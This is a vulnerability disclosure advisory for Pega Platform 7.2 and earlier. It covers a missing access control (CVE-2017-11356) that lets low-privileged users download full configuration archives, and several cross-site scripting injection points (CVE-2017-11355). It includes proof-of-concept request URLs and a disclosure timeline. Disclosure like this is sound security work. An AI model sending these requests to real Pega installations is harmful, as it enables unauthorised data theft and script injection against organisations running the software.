Summary
=======
1. Missing access control (CVE-2017-11356)
2. Multiple cross-site scripting (CVE-2017-11355)
Vendor
======
"Pegasystems Inc. is the leader in software for customer engagement and
operational excellence. Pegaas adaptive, cloud-architected software a built
on its unified PegaA(r) Platform a empowers people to rapidly deploy, and
easily extend and change applications to meet strategic business needs.
Over its 30-year history, Pega has delivered award-winning capabilities in
CRM and BPM, powered by advanced artificial intelligence and robotic
automation, to help the worldas leading brands achieve breakthrough
business results."
https://www.pega.com/about
Tested version
==============
PEGA Platform <= 7.2 ML0
Vulnerabilities and PoC
=======================
1. Missing access control on the application distribution export
functionality (CVE-2017-11356)
Low privileged users can directly access the administrator resources to
download a full compressed file with configurations and files of the
platform, a 300MB compressed file was downloaded in a production
environment.
Affected components could be found on the PEGA Designer Studio through the
"Application > Distribution > Export" path.
To exploit this vulnerability the following requests must be made:
1.1 Export Mode: By application
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Application.pzLPPerformAppExport&ApplicationName=APPNAME&ApplicationVersion=VERSION
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/APPNAME_VERSION_DATE_GMT.zip
1.2 Export Mode: By RuleSet/Version
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-RuleSet-Version.PegaRULESMove_RunBatchReq&pyZipFileName=configurations.zip&pyRuleSet=APPNAME&pyRuleSetVersion=VERSION&pyAppContext=&PageName=pyZipMoveRuleSets
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip
1.3 Export Mode: By Product
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Rule-Admin-Product.RunBatchReq&ZipFileName=configurations.zip&ProductKey=RULE-ADMIN-PRODUCT%20APPNAME%20DATE%20GMT
https://PEGASERVER/prweb/RANDOMTOKEN/ServiceExport/configurations.zip
1.4 Archive On Server
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=@baseclass.DownloadFile&FileName=FILENAME
2. Multiple cross-site scripting (CVE-2017-11355)
2.1 Main page
https://PEGASERVER/prweb/RANDOMTOKEN/![XSS]
2.2 JavaBean viewer
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-IS-.JavaBeanViewer&beanReference=[XSS]
2.3 System database schema modification
https://PEGASERVER/prweb/RANDOMTOKEN/!STANDARD?pyActivity=Data-Admin-DB-Table.DBSchema_ListClassesInTable
POST:
pzFromFrame=&pzUseThread=&pzTransactionId=&pzPrimaryPageName=pyDbSchemaTablesList&pyDatabaseName=PegaDATA&pyTableName=[XSS]
Variables
=========
PEGASERVER: IP/domain of the platform installation.
RANDOMTOKEN: random token generated per installation, it is random but
known to the user.
APPNAME: name of the application.
VERSION: application version.
FILENAME: physical filename of the backup.
DATE: current date of the request.
Timeline
========
01/06/2017: Vendor is notified through support and security email
07/06/2017: CERT/CC contacted, vulnerabilities are not coordinated
17/07/2017: No response from vendor, CVE assigned, full disclosure